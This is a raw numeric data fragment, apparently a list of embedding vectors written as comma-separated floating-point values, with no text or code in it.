-0.021591537,0.0024030572,-0.027919652,0.0023638299,-0.0027850661,-0.0064358995,-0.051690694,0.014596165,0.034271013,0.0023442137,0.0033516055,0.023195887,0.028792756,0.02570377,0.009729253,-0.013629602,-0.020920059,0.005220681,0.004959652,-0.006717848,0.00043723325,-0.008636687,0.02089411,-0.013460953,-0.007601684,-0.035320207,0.004870677,0.010992485,0.0004332012,0.0026679335,-0.008336859,-0.0026251052,0.016762674,-0.007123715,-0.011724905,0.010396875,-0.003671497,-0.002075884,-0.019688511,0.02098339,0.00087976275,0.03926347,-0.009650088,0.0050018835,0.010822732,0.024500504,0.0087403385,-0.019344172,-0.022865538,-0.03537652,-0.010240325,0.04064239,-0.015639182,0.0036064545,-0.0006766043,0.0014048105,0.013488712,-0.010703692,-0.025040098,-0.012875065,-0.014223308,-0.0013486036,0.006562237,0.008867213,-0.0026201867,0.029137539,0.0061863028,-0.009387692,-0.0055359397,-0.003591546,-0.016849387,0.00022887698,0.02827671,0.010062948,0.013902064,0.0074308864,-0.0034377864,0.036925364,-0.028599836,-0.0028255421,0.010365646,-0.013160623,-0.0003768133,0.00085246324,-0.0070053567,-0.012937674,0.0053089336,0.008684902,0.026323808,-0.0059843403,-0.009816911,0.0066128233,-0.0023046925,-0.00080784236,0.004781106,-0.014074673,0.0036790927,0.0023473187,-0.0084244115,0.024119468,-0.015717877,-0.011695483,-0.0010053779,0.026866857,0.024248607,-0.0028577007,0.00634529,-0.024249619,0.010191536,0.005554065,0.008420399,0.003784977,-0.041335057,-0.019960044,0.013650735,0.00032235423,0.010232823,0.0076651736,0.012353723,-0.0057040267,0.01640161,0.024814714,0.0010682704,0.007873955,-0.021549582,0.0069565326,-0.028119717,0.018324612,-0.0073628514,-0.0019384538,0.018020704,0.0016063345,-0.0032023296,0.00048762246,-0.0114608435,-0.021023512,-0.015911585,0.0073166005,-0.001066056,-0.016916225,-0.005835577,0.007639583,-0.0054960423,0.000110771005,-0.043428708,0.015333329,0.00929921,0.0038695226,0.0091269575,0.00032059895,0.01351256,-0.0032777016,-0.013220172,0.0041652285,0.019846408,-0.0149653535,-0.014514604,0.025921078,0.010018671,-0.013462709,0.0017230435,0.02265816,0.0005605697,-0.009036313,0.01528023,0.0029082985,-0.011104165,-0.006770104,0.0038185648,0.008315134,0.04198269,-0.0023623665,0.028825339,-0.0057833386,0.0074759317,0.000039094655,0.010458525,-0.018897852,0.06814404,-0.03048246,-0.034046747,0.0110257575,-0.0018192932,-0.005110967,0.007993086,0.030966008,-0.010677415,-0.0066205533,-0.02215222,-0.0037561313,0.0034738423,0.026735952,0.013047974,-0.00092840404,-0.01969809,-0.02104364,-0.00895891,-0.03145,-0.01712764,-0.015240272,-0.005248716,0.003134315,-0.014420735,-0.009744467,-0.0023114958,-0.0085116355,-0.017997881,-0.003964997,0.026262173,0.009157068,-0.0140124075,-0.009022782,-0.011230775,-0.018768143,-0.0043161716,0.005451482,-0.010362525,0.016102469,0.005828341,0.0011919608,0.0027417645,0.010701368,0.0061956337,-0.0050343587,0.011580511,-0.0154836895,0.0044378885,0.012330509,-0.0028736216,-0.011039144,-0.02742162,-0.028166736,-0.0062451777,-0.009642262,0.0133834835,-0.028742068,-0.018128159,-0.008507478,0.020121126,0.0028310255,-0.01436653,0.016292261,0.025282033,-0.008970113,0.014725642,0.011952801,-0.0070065176,0.009421796,-0.0072722225,-0.016315639,0.006795571,-0.0027079284,-0.019948367,-0.022572828,-0.0028876432,-0.008433373,0.007839499,-0.0107462285,0.014764138,-0.028940337,0.0037653528,0.010698551,-0.014757934,0.02071981,-0.016822714,0.0112588415,-0.012846203,0.0029328796,0.0012926966,0.0051261806,-0.04708001,0.005073505,0.050052885,-0.016645817,-0.023244167,0.0040639862,-0.012572477,-0.049397565,-0.031231688,0.014417562,-0.0008748737,-0.012839225,-0.019852653,0.034247465,0.0061916895,-0.02035354,-0.012984431,-0.0019857255,-0.013232369,-0.011699382,0.014184255,-0.012502917,-0.00091294735,-0.009839878,-0.014953348,-0.019913517,-0.035459295,0.0024599866,0.006546426,-0.0029037194,0.011857556,0.023320206,-0.008901833,-0.0042777904,-0.0012635114,0.007464329,0.0077591613,0.017116917,-0.022382708,-0.02584993,-0.030445194,0.0042727035,-0.017629368,0.0052558854,-0.003817061,-0.00764651,0.0031972006,0.01695464,0.17193526,-0.00343774,-0.024942074,-0.01091308,0.0007368247,-0.009545516,-0.007582856,0.017061869,-0.014285334,0.012532707,-0.008414968,-0.009955044,-0.0023272727,-0.0012164738,-0.00027201872,-0.033272047,0.0041033654,0.1774062,0.01866483,0.009047682,0.0127123855,0.0054220413,0.012147037,0.014461401,-0.002107195,-0.059253126,-0.012502741,-0.040672787,0.014399597,-0.0074985735,-0.020150935,-0.004335885,0.0020048774,-0.0070126215,-0.0006917848,0.005009818,-0.00879236,-0.02259822,-0.0111395335,-0.017905721,-0.010175123,-0.017384384,0.006028238,0.017584525,-0.0041132946,0.0011861831,-0.0019359865,-0.0045703296,0.013228982,0.036823455,0.037026078,-0.00888242,0.0031078851,0.0017340457,-0.00040257446,-0.0065822834,-0.0058020055,0.0018629421,-0.024535138,0.01691243,0.00804773,0.010778815,-0.009963093,0.033627626,-0.008132886,-0.015936164,-0.004298305,-0.0050516967,-0.0042921463,0.007416201,-0.004501346,0.0060490672,-0.010134078,-0.009485383,0.021115448,0.0034670278,-0.011445746,0.009592897,0.015777456,-0.010859294,0.018523723,0.019262891,-0.008878413,0.013817705,0.0073903915,0.017963663,0.023109568,0.012645972,-0.004557665,0.021138078,-0.011959563,0.019146565,-0.0019466146,0.0072860834,0.015414178,0.021888359,-0.0027803227,-0.003912647,-0.0015088621,-0.04355543,-0.011131814,0.0056887777,0.003922158,0.018545073,-0.023566019,0.005234531,-0.018678978,0.004569945,-0.001002766,-0.007585774,0.014039692,0.0070678964,0.008151989,0.013951077,-0.021146627,-0.013936992,0.0037271988,0.018273883,-0.01633727,0.02146835,-0.0024483167,-0.00052828825,0.024026508,-0.0060182656,-0.0028935787,0.00816594,0.007110266,-0.017039493,-0.022793643,-0.001984411,-0.0038383482,-0.015228069,0.025076184,0.009806205,0.010330497,0.0059539406,0.004373874,-0.025444072,-0.0057662204,-0.0023922713,0.01745971,0.0054483763,0.008693463,0.016700322,0.0026925122,-0.008157466,0.00127868,-0.007151338],[0.0042963685,-0.0021731385,0.0125153605,-0.00811911,-0.006551489,-0.014410917,-0.014577512,0.007831645,0.011173581,-0.007708455,-0.0032188557,0.03436407,0.01097427,0.010107324,-0.022515878,0.0012493997,-0.005122005,-0.009838512,0.01096849,-0.017803082,-0.000635176,-0.0028162708,0.0036137588,-0.005786985,0.010871702,0.017152475,-0.0034451613,0.010778317,-0.0009766353,-0.034160424,0.011463393,0.019236872,-0.003056257,-0.016785726,0.0053601163,0.012239709,0.002721494,-0.010114015,0.003860113,0.0068236245,0.018232096,0.00003075534,-0.016774213,-0.000058248643,-0.016960701,-0.011409545,-0.013975118,-0.014885181,-0.024909768,-0.0024186631,0.006433188,0.013707307,-0.0015616934,0.0137511175,-0.014401513,0.020146664,-0.00360564,-0.027319547,0.030253211,-0.01671861,-0.018417068,0.017327664,-0.0058589056,0.00087653444,0.0277703,0.00933023,-0.010539856,-0.009544231,-0.013135317,-0.013342095,0.01657147,-0.011337557,-0.0012523811,-0.00345186,-0.007278303,0.013567825,-0.019624176,-0.014192993,-0.02514645,-0.009551236,-0.044356387,0.006431626,0.015335651,-0.0075638136,0.01632179,-0.00105702,0.00589638,-0.0005221976,0.011971927,0.000834782,-0.029476527,0.0020358232,0.0010959903,0.008354466,0.0137622,0.025810849,0.001569037,-0.013182563,-0.013560855,-0.00891744,-0.009668837,-0.0012186803,-0.024914658,0.0050620963,0.0007620771,0.0024284231,-0.00032836516,0.009496544,-0.0057064975,0.005131617,0.000902425,0.019237852,0.008487512,-0.020993944,0.004891017,-0.0010473429,-0.005756543,0.018610967,0.0050912094,-0.0019238546,0.013861828,0.00887363,0.021040132,-0.012697531,-0.0025444722,-0.0018060739,0.0086194,-0.0025315033,-0.0011706378,-0.02771781,0.007128159,0.019963194,-0.0011424429,-0.0006598033,0.0039158207,-0.0076723164,0.0045594643,0.00827481,0.0012915771,-0.016586503,0.009099837,0.011538057,0.02641457,0.006546399,0.007013851,0.018956544,0.007389459,0.016130185,0.032057945,0.009318532,0.0053160326,0.016112084,-0.011873655,-0.017841514,-0.0009686794,-0.014350339,-0.014680651,-0.020579638,-0.012721607,0.012199633,-0.020892585,-0.01166705,0.0011058011,0.027258316,-0.014974194,0.0036588756,0.009974078,-0.013459908,-0.010391824,0.0053900243,-0.0010427503,-0.0017496702,0.021933343,-0.0068392465,-0.003599549,0.0046785953,0.024990061,-0.0123650925,-0.02564538,0.016763834,-0.014797017,0.019610856,0.0049702805,0.0048118792,-0.018063229,0.029457582,0.009176967,0.010081476,-0.0029502066,-0.009620244,-0.013568404,-0.024217047,0.002005899,-0.0049966485,-0.0036802462,-0.02283503,-0.015999893,0.15716332,-0.008242877,-0.018623212,-0.024043925,0.00392601,0.018536383,-0.010223947,-0.0058180834,-0.024443356,-0.017846318,-0.0016493271,0.0045808866,-0.015888548,0.0075252377,-0.006153824,0.013362435,0.011434547,0.027316881,-0.07658339,0.00338411,0.032800935,-0.02863776,0.013852492,0.021094376,-0.0014551204,-0.0016084438,0.0023466686,-0.02657745,-0.020978956,0.019383837,-0.011557669,-0.0051881666,-0.03682858,0.016375136,0.018023947,-0.03191743,-0.025226137,0.014042091,-0.012133048,0.0069057187,-0.0022947874,0.0135685485,0.005816646,-0.01630799,0.0010974612,0.015191843,0.007646213,-0.0030955207,0.009720562,0.023431197,0.0033506667,-0.007640676,-0.0044856765,-0.008110693,-0.010767326,0.0136598805,0.0074221333,0.0026570358,-0.008610642,-0.0025343413,0.019585906,0.0026599965,0.025173217,0.012437956,0.023131475,-0.016837291,0.015884344,0.031406872,0.0066173654,0.008448666,-0.04452871,-0.01861749,-0.01852462,-0.042198185,0.01370794,0.016065763,-0.019430695,0.010544296,-0.0043637487,0.0360473,0.013389403,0.01569319,-0.015095455,-0.0037219627,-0.006275589,-0.0059743854,-0.01458861,-0.03268672,-0.011996657,0.010671031,-0.0017781802,0.02378795,-0.0048844228,-0.024124209,0.01156078,0.008674306,-0.006474094,-0.015770037,-0.02085091,-0.009415668,0.012828261,0.01466846,-0.010109079,0.0010511556,-0.012832893,0.03453326,0.012860671,-0.003559919,0.0061514224,0.0033868917,0.015612854,0.013158566,0.010011544,-0.016859079,-0.018945735,-0.01033849,-0.004861086,0.007717723,0.0118484525,0.020742817,-0.0075197634,0.006232099,0.010884131,0.015710587,0.004032053,0.000589418,-0.012819273,0.00017821176,-0.01212463,0.037086956,-0.0025895718,0.014051241,0.02533608,0.015529233,0.0014222664,0.010876265,0.019845176,-0.012863086,0.011680045,0.008210527,0.013923915,0.006702218,0.042486206,-0.008488279,-0.0026602657,-0.023182737,0.001617243,-0.0031544575,0.013568355,-0.0160194,-0.01831329,0.019822566,0.0082013905,0.007127024,-0.0083166305,-0.023575751,-0.014079447,-0.0012612654,-0.00086353795,-0.016648794,-0.010042655,-0.031111844,-0.008212693,0.021290008,-0.017525394,0.017696206,0.0016005934,0.07450375,0.01487164,-0.004212961,0.014149007,-0.0022399176,-0.011011751,0.019075207,0.026694495,0.0011074026,-0.0032303045,-0.011675341,-0.013738512,-0.0018592016,0.0046031107,-0.016811732,0.0031018772,-0.018312022,-0.015371411,-0.030405637,-0.019033125,0.0327881,0.004022908,-0.011346267,0.00786975,0.0229632,-0.0019787482,0.008250031,-0.010045098,-0.013683555,-0.013676537,0.0023228321,-0.021219963,-0.012195255,-0.0016240423,-0.016237065,0.02243095,0.0059741973,0.0003281881,-0.0005405583,-0.011440301,-0.0014855495,-0.013822362,0.0032699318,0.009402242,-0.013912398,0.026547847,0.013393942,0.007903029,0.005933202,-0.0061237756,0.011508095,0.008470491,-0.018162819,0.024559416,0.003848521,0.0048712445,0.008980493,-0.01679095,0.029824652,0.023595974,0.017596923,0.009352407,-0.02461877,0.006010381,0.004791544,0.03393629,-0.0052569443,-0.007109418,-0.025300032,-0.01554601,0.00046367547,0.0017348039,0.015472229,0.012813878,0.0025559817,-0.008880443,-0.0007974787,-0.0068505555,-0.017184054,-0.0102140475,-0.003978249,-0.009786037,0.008718342,0.018699579,-0.0033001306,-0.0026676354,0.008067142,0.016156914,0.015660577,-0.021653222,0.0368388,0.011374608,0.021324128,0.0050568325,0.039203867,0.0141527355,0.017634822,-0.013464743,-0.013325645,0.02761698,-0.015776733,0.01581446,-0.0024896811,-0.014311446,0.008139461,-0.012718272,-0.018264735,-0.02375705,0.009743209,0.023101509,-0.009270153,-0.008659266,-0.01719463,0.0028712328,-0.0015016962,-0.015066436,-0.012316823,0.010613302,0.007416457,0.026128266,0.024469327,0.012952424,0.017179102,0.021717643,-0.0011072488,0.021288237,0.0038940797,0.0018425584,0.010149659,0.008874812,0.009930241,0.016662525,0.009800501,-0.053236715,-0.0010907609,0.011023402,0.008227846,-0.01539056,0.02056135,0.017654318,-0.0075381882,0.0075433697,0.014958019,0.0072210417,0.0015930143,0.007451269,0.0147439875,0.0037154306,0.020092743,-0.015950551,-0.0091351485,-0.005683742,-0.008472032,-0.009033703,-0.011956072,-0.008317867,0.03513227,-0.015760472,-0.03916449,-0.002889222,0.04151639,-0.022907881,0.022798575,-0.020886416,-0.010418986,-0.007108278,0.020703124,0.095737964,-0.0036373988,-0.024891455,0.003468398,0.0011574586,-0.003484224,-0.008081104,0.0042812503,-0.0070818923,0.024373716,0.014094889,-0.017516935,0.00394043,0.0057761488,-0.007097683,-0.0044934982,-0.0065766387,-0.014117137,-0.0010815682,-0.0028261486,0.00362077,0.00005302447,-0.020161588,-0.04418929,-0.016888421,-0.0055545284,0.01330697,0.019380055,0.0014212929,0.002233132,-0.014353051,0.0061128032,0.0013841749,-0.008273396,0.007834317,0.011515314,-0.006167639,0.0042677266,0.011942608,0.037086636,0.008624323,-0.0058557116,0.012777506,0.023538617,0.010166438,-0.01991876,-0.022360668,0.0067291474,0.010380388,-0.004993353,0.00014388336,0.03367786,0.0064814505,0.004630685,0.004195128,-0.017269539,0.026633633,0.014994544,-0.0089609325,0.013264824,-0.01532397,0.0045305677,-0.022858605,-0.025540147,-0.00011868765,0.00044873575,0.00015042748,-0.016495086,-0.0064494875,-0.022432378,0.004709466,0.006991944,0.008676252,-0.011457276,0.016958067,0.013670666,0.012993042,0.0255407,0.016058344,-0.016533969,0.013488605,0.011489295,-0.005814547,-0.021662498,0.0037276063,0.010069861,-0.013081434,0.019707328,0.008799534,0.002724235,0.016322719,-0.0057222587,0.0119312545,0.0018191409,-0.00072682573,0.015293866,0.0079425955,-0.011834274,0.008108512,0.027416017,-0.01801498,-0.037414167,-0.024327403,0.038619235,-0.004606755,0.0065408004,0.004825699,0.020850403,0.007787156,-0.022777282,-0.0021614819,-0.058544777,0.029833822,0.02609014,0.026503341,-0.020856973,0.032789864,-0.019130094,0.011800025,0.004579576,-0.007934154,0.005179362,-0.007984389,-0.0027963636,0.0029469081,0.0027903651,0.0021305915,-0.031254254,-0.03665368,-0.014491183,-0.028477097,0.018160341,0.040464073,0.012734638,0.0029277997,0.00635906,0.010402421,-0.0032136606,-0.008438214,0.0008867786,-0.0146318,0.013980599,0.008392768,0.004009567,-0.0066100806,0.02186199,-0.00397894,-0.0074965185,-0.0063258978,-0.0005244925,-0.00945468,0.012668426,-0.011218726,-0.010090451,-0.0019925402,-0.013846273,0.022245038,-0.017277276,0.012834217,-0.0049994006,0.028371949,-0.012246031,0.00057901617,0.005709047,0.010903308,-0.010823124,0.0088856425,-0.01235625,0.03069401,-0.009377936,0.0012455896,0.006224244,0.018484961,0.0137320645,0.0054249167,0.0033962987,0.013589575,0.032432456,0.006346276,-0.015186896,0.0073891827,0.007115247,0.029104814,0.02152915,0.014258233,0.011239566,0.0031605002,0.0074756737,0.0014013338,-0.0027683089,-0.024553217,-0.0002918234,-0.030388279,-0.017196642,0.018239444,0.0093689,-0.018826434,0.022010002,-0.026564429,-0.003964388,-0.008800396,0.0019879325,0.022020817,-0.013866021,0.0019615449,0.0047171386,-0.004856102,-0.019620983,-0.029192736,-0.020337436,0.027373584,0.008661359,-0.024409484,0.008918296,-0.01938526,-0.0108181685,-0.026885867,-0.022454621,-0.025210861,-0.0146716945,0.03110137,-0.001879623,0.0147315925,-0.0018048248,-0.0039541204,0.0122459335,0.033715058,-0.014648792,0.017446488,-0.012120736,-0.004419259,-0.001696256,0.03616678,0.0046653594,-0.02523426,0.006351051,0.002623571,-0.006721312,-0.012526237,0.007619027,0.017277239,0.0226684,-0.002241145,-0.019436385,0.008473616,-0.008024207,-0.03269158,0.027710468,-0.019304771,-0.007889246,0.001969948,0.004159032,-0.0028026171,0.024819184,-0.0052899765,0.019085133,0.0030051167,-0.0019263823,0.010374356,-0.0000113267215,0.0013364832,0.02058866,0.016781546,-0.012909499,-0.013003168,-0.042410556,0.029526228,-0.021682302,-0.0046733413,0.0113142505,-0.021986898,-0.022226086,0.00071841246,0.0060974094,-0.015763875,-0.0014088491,0.00036490394,-0.037851978,0.013443728,-0.0028053895,0.019695116,0.0053531774,0.001610699,-0.017343646,-0.0015522939,-0.0016038945,-0.019227143,-0.028824119,0.019813202,0.009883987,-0.006898197,-0.007773585,-0.023588337,-0.044968106,-0.0011439703,0.0015765775,0.036608484,0.027660765,-0.011860644,0.0027867944,0.005917678,0.0074733184,0.012537576,0.02182309,-0.032128848,-0.014980283,0.0011489667,-0.024401149,0.011858245,0.0023105107,-0.006873253,0.033704765,-0.0054024616,-0.02178566,0.015353427,0.0054173856,-0.01161874,-0.009080966,-0.011002809,-0.009633065,-0.0060579674,-0.0076826373,-0.006017371,0.009989002,0.001818067,0.005207957,0.0077403225,0.009519846,-0.0022989202,-0.027148651,0.008067404,-0.004362492,-0.011771232,-0.0066224174,-0.008766928,0.0020795015,-0.017108189,0.0023381137,0.027827324,0.010026474,0.012668869,-0.0011089653,0.010440142,-0.00978202,-0.019129818,0.010611341,-0.011828827,-0.003484187,-0.002856397,0.0000084530375,-0.00007144489,0.013284086,0.026995555,-0.009670146,0.018550385,0.0026453834,-0.020773513,0.0070522344,-0.009284515,-0.016154565,-0.0022949087,0.01100868,-0.03416913,-0.012527158,-0.012097561,0.009452063,0.017384164,-0.03805238,-0.007898564,-0.0022177491,0.012872982,0.027383676,0.009275132,-0.020952621,-0.015399952,0.016173285,-0.010999609,0.0034990972,0.007050233,-0.0053614634,0.03355772,0.0048546125,0.02310282,0.007113087,0.0083284145,-0.00807194,-0.0020697897,-0.008931925,-0.019581538,0.009265236,-0.009318932,-0.009408316,0.010865321,0.014434569,-0.009597495,0.00894839,-0.0053008925,0.0073798345,0.027146569,-0.0044991667,0.0049154074,-0.0008579486,0.026731309,0.014623621,0.0025612428,0.0091478415,0.0011781438,-0.042461596,0.024757503,0.0019472607,0.003718119,-0.01637305,0.018504778,-0.0037261115,0.006381627,0.035105262,-0.016960297,0.022211002,-0.016059425,-0.023784952,-0.0027813073,0.003341751,-0.012479214,-0.02360005,0.009067222,0.008448031,0.00091875653,-0.009148886,-0.0021167283,0.0056363037,-0.0025661455,0.0029146913,-0.0034131496,0.016898999,-0.02803199,-0.028497182,0.0045504067,0.025892895,0.005534198,-0.000304373,-0.02087506,-0.022315772,-0.020618798,-0.0027245332,0.012599243,-0.019169234,-0.0042993836,-0.014062721,-0.009317395,-0.017867899,0.023318911,-0.015423864,-0.0026421344,0.0049385526,-0.01800409,-0.020322647,-0.017748062,0.024889898,-0.021373216,-0.009526922,0.026623473,-0.0027243625,0.020609906,0.0162048,0.00806835,0.0035773034,-0.014186243,-0.0040655453,0.009714833,0.001560214,0.0057622488,-0.024967562,-0.02303975,-0.0054880343,0.014354173,0.004367183,-0.0077732997,0.00040910792,0.010027905,-0.0057344227,0.010549637,0.0010567687,0.020701317,0.02001018,-0.013734816,-0.0020903877,-0.0037104401,-0.0062392727,-0.008482825,-0.01599556,0.010666338,-0.012288435,0.01089808,-0.013424267,0.018140525,0.0035416917,-0.02902019,0.005690874,0.0008896367,-0.013081114,0.02732239,0.0009739149,0.025791865,0.001289528,0.01997401,0.0038244575,0.0032542788,0.013014076,-0.010649304,-0.019176967,0.04203005,-0.0023790884,0.00067151984,0.0047543803,-0.008696218,0.018914979,0.020185545,0.0074503464,-0.012016267,0.0010997074,0.00081322505,0.023320906,-0.009015568,-0.019910216,0.026760524,0.026885219,0.008543956,0.012570194,-0.002248005,0.02401454,0.0052888533,-0.02200449,-0.004382194,0.004578309,-0.005582334,-0.024085706,0.010807993,-0.009031775,0.01974065,-0.0023324655,0.0003136199,0.029456098,-0.004810993,-0.0068003726,-0.004197208,0.0010778125,0.014465232,-0.015059454,-0.013926155,-0.039497584,0.01418675,0.00021121906,-0.011003262,-0.013651666,0.011954291,-0.0076452047,0.022207804,0.000022360442,-0.009484152,-0.009558678,-0.03541078,0.0014686337,0.01962181,0.0038722807,-0.014727418,0.006197393,0.01699796,-0.0062317536,-0.024065606,0.011411908,-0.007824416,-0.034115802,-0.0133621115,-0.0008042809,0.0070063784,-0.037545033,0.002509953,0.012702169,-0.011564563,-0.0018086673,0.01724485,0.013223466,-0.029692475,0.0158008,0.009522876,-0.013347793,-0.011691527,0.00024846187,0.026537115,0.00866357,0.006334505,0.018521065,-0.022058783,0.0067388583,-0.0038633398,-0.02725135,-0.008638714,-0.009853681,0.02578059,0.0025190401,0.003777593,-0.018297775,-0.008679814,0.011722656,0.023891926,-0.00580979,0.019174272,-0.010218167,0.016906299,0.008471333,0.0055914093,-0.032297704,-0.007926627,0.023285475,-0.010304531,0.000120327524,-0.014559547,0.0013289276,-0.008555861,-0.005152783,0.0048064864,-0.0045881057,-0.0005397701,-0.025497774,0.006871489,0.020489164,-0.029316036,0.017685413,-0.011405039,0.0059772446,-0.001067418,-0.017176826,-0.018432152,0.0028819323,0.00093480863,0.0024121131,-0.0077274186,0.013574028,-0.031036558,0.011405841,0.021491742,-0.011712415,-0.0028361827,-0.015799047,0.004926356,-0.017144667,-0.028395396,0.002827958,0.017630735,0.0028485982,-0.00408625,-0.013668031,0.03320812,0.009634062,-0.007879784,0.0021470247,-0.0020048155,0.006193454,-0.010175451,0.012743257,-0.00094332354,-0.017894968,0.0032358533,-0.0022289357,-0.008454285,-0.016310424,-0.02311492,0.0029616002,-0.009542127,-0.0061797397,0.008152256,0.025743283,0.0092379805,0.025137465,0.012293413,0.0004331778,-0.0015786195,0.0129095465,0.008514961,0.017307185,0.006546613,0.00482103,-0.015661875,-0.03141231,-0.0151439775,0.018775314,0.0009969969,0.010698588,-0.01456585,0.015029877,-0.023686983,0.008088136,0.0044678813,0.010374359,-0.029140681,0.009920591,-0.01666401,0.0030914422,-0.017233584,0.007064657,0.00008659296,0.035671506,-0.009307291,0.007913467,0.0045712623,0.009051837,-0.017131235,0.054917473,-0.011606676,-0.007735746,-0.01670144,-0.0036828779,-0.018254811,0.010197544,-0.007323812,-0.0021215107,0.0032205768,-0.013425871,-0.018578911,0.017819114,-0.025509508,0.013315448,-0.0030194868,-0.0052097742,-0.0015243227,-0.015815752,0.0007773934,0.008940883,0.0023428053,-0.002285136,0.0028354437,-0.02236298,0.020276956,0.007799452,0.014564077,-0.011794259,0.006371562,-0.003745397,0.0023804067,-0.0065233284,0.035699632,-0.018075,0.00024965944,-0.005116996,-0.017682012,-0.0042339955,0.009518886,0.002980238,-0.031598095,0.06617256,-0.0046403892,0.0030514023,-0.004805217,-0.002518186,-0.003659543,0.017856464,-0.0035842592,0.019700574,0.02898062,-0.01405222,0.018490404,-0.0016133974,0.020631446,-0.005241753,0.010500743,0.0050151614,0.009208219,0.010480385,-0.0075972625,-0.014484678,-0.0011307347,-0.010968663,-0.022280749,0.0048025106,-0.022388076,0.014416541,-0.015284046,-0.021573959,-0.0077952696,-0.011816921,-0.034409985,0.0039368793,-0.0045390064,0.026090357,-0.030508688,-0.001549821,0.021046033,-0.012421794,-0.03707149,0.029472131,-0.012352391,0.004215137,-0.0013217774,0.023692302,-0.012644757,0.07999809,0.030691626,0.00968114,-0.01821452,0.011090177,0.010465296,-0.04020149,0.0133655965,0.010223458,0.0048724334,0.0074770777,0.031805053,-0.0075036883,0.012371987,0.018897118,-0.010799314,-0.012355238,0.005238109,0.011240981,-0.018787203,-0.022606233,0.022492211,0.007988877,0.0055991304,-0.004944374,0.0270913,-0.00063649745,0.008151015,0.027509896,-0.018594202,-0.006448938,0.0033365684,0.010070734,0.009693367,0.025558017,-0.0630624,-0.0020281712,0.19650629,0.003402377,0.009701012,0.021796664,-0.008561632,0.015591005,-0.07806106,0.015781319,-0.003662696,-0.0030681144,-0.014938241,-0.021148948,-0.010870437,0.027269669,0.021059949,0.005740943,0.014291079,-0.038114496,0.00002215282,-0.016906962,0.0064679715,0.014195538,0.019090826,0.012054481,-0.012070765,-0.0092314305,0.023750735,-0.018016998,-0.015996546,-0.004084513,0.009111543,0.0066038687,-0.0016451002,0.006880771,-0.031355396,0.012978619,0.017577281,-0.005698596,0.0028891382,-0.024694247,0.010332229,0.008452191,-0.014970406,-0.04617135,-0.15864566,0.004585844,-0.0037859208,-0.026236681,-0.008108332,0.023337273,0.008208093,-0.0059918715,-0.0009749938,-0.008356094,0.004337858,0.002679481,0.010548414,0.0063538556,-0.004083067,-0.00514966,-0.00075460353,-0.00003832049,0.00559818,0.00173363,0.023966227,-0.003545468,-0.031262055,-0.012664601,-0.00024216829,-0.0052130288,-0.016693575,0.011808237,-0.0013797752,0.012601505,-0.019817838,0.019608296,-0.0029499142,-0.002167648,-0.021135883,-0.027924346,-0.014866279,0.004446098,-0.026377717,0.0068007023,0.0056435424,-0.022906005,0.000540632,0.00015251542,0.0033299958,0.027674379,-0.0049742786,0.0019495746,0.005113774,0.012869882,0.03447066,-0.0068570655,-0.038182154,-0.000852027,-0.015793333,0.0004700805,-0.0018126679,-0.026999835,-0.012021476,0.002673911,-0.0071592564,-0.019292504,-0.018949311,-0.034832936,0.022488847,-0.01604698,-0.0038087554,-0.024588747,0.0015698089,-0.004539659,-0.006708478,0.012050402,0.016614316,-0.020480707,0.0090836985,0.02685794,-0.017922413,-0.0021278898,0.006961928,-0.009010805,-0.025031189,-0.023391744,0.01607378,-0.019853204,-0.00567243,0.00920234,-0.014528935,-0.022735305,0.005327024,0.009245229,0.007651237,0.009954753,0.03506251,0.0010444303,-0.011748559,-0.0017953912,0.027358508,0.00014003673,-0.032031577,0.021041827,0.009584684,-0.00830067,-0.008527742,0.0125406645,-0.019634474,0.01027328,-0.021833517,-0.018575277,-0.0230103,0.00053911394,-0.011792299,0.0049837814,0.005608167,-0.029120833,-0.035302147,-0.037114203,0.01285947,0.02902466,0.008509687,-0.013214624,-0.029791594,-0.019655198,-0.01981568,-0.006321837,0.03239348,0.013990272,-0.024132494,-0.0013303573,-0.0113851065,-0.019230986,-0.006101935,0.011953854,-0.004526649,0.00015484693,-0.0062064882,-0.0053283605,-0.009585118,-0.013588161,-0.028206745,0.013303473,0.013553984,-0.025319148,-0.0075161816,-0.009875264,0.026773056,-0.0071771913,0.00982277,-0.01849412,0.008421951,-0.019713204,-0.008032287,0.030965907,-0.016436072,-0.024572514,-0.008592842,0.08835902,-0.014982944,-0.004163392,-0.004591294,-0.0067754304,0.00960838,0.0075230002,-0.022578834,-0.0022742832,-0.0315247,-0.038235098,-0.010620867,-0.0073986715,0.0036728368,-0.023200763,0.023934096,0.0024227572,0.008078957,-0.0039221025,0.004143935,-0.0028627245,-0.013831848,-0.0018800829,0.03440573,0.029841276,-0.024318174,0.0070893043,0.0047303326,-0.00923734,-0.009712989,-0.009270853,0.008229209,-0.0079036765,-0.017662376,0.007808205,-0.056045353,-0.0262008,0.0046512405,0.019619051,-0.0025280816,0.0115070455,0.007476921,0.010887842,-0.009265368,0.009639294,0.010495427,-0.012447446,0.015179121,-0.00928709,0.0092729265,-0.0025802697,0.012704678,-0.0023476474,-0.023998344,-0.01273645,-0.039217252,0.0076694917,-0.010137921,0.0026944506,-0.01226535,0.043025695,-0.021072,-0.0052260435,-0.0005229392,-0.004550428,0.024180774,0.004047087,0.013347236,0.0026926622,0.042815503,-0.0010570141,0.0151059115,-0.005144564,0.016100733,-0.017127091,-0.0040441076,-0.023282357,0.00561196,-0.013192158,0.006682225,0.0015079018,-0.0066764913,-0.008453392,0.020230865,-0.018616367,-0.054858632,-0.011190572,-0.007406487,-0.023865543,0.017265933,0.010056036,0.015633313,0.021988839,0.01374429,0.025024459,0.004885949,0.008397763,0.0076740417,-0.010585792,-0.013014452,-0.0058544725,0.030706825,-0.016456435,0.010597385,-0.006091084,-0.025532497,-0.011414739,-0.012984259,0.0070314826,-0.036683988,-0.003528215,-0.02068124,0.013105131,-0.016738683,0.0025964265,0.04792885,-0.009559996,-0.007071954,0.015737554,-0.013487096,-0.026271218,-0.025916543,0.010335415,0.005385738,0.018943598,-0.009030245,-0.013366525,0.016563969,-0.0068833474,0.015666088,-0.0076033277,0.024445867,-0.01284137,0.01938524,0.004809659,-0.0019931218,0.011430285,-0.00074390514,-0.012057309,0.0029146196,-0.026350709,0.010683915,-0.00023537016,-0.009160543,-0.012089518,0.0074793585,0.014405965,0.0045134267,-0.020096492,0.005449851,-0.017349783,-0.00039210136,-0.008197572,-0.0011396434,-0.0035131902,0.017843582,-0.020287182,0.007984585,-0.004382374,-0.015012046,-0.018434264,0.022566311,0.0021522285,0.0048798006,-0.020467691,0.027195176,0.02151486,-0.02890014,0.027181694,0.0014379793,-0.014489524,-0.022256514,0.01835776,0.009881897,-0.005861036,0.004629233,0.002846076,-0.0045904885,-0.012558907,0.027772726,0.028910844,0.022874475,-0.014081308,0.0138849225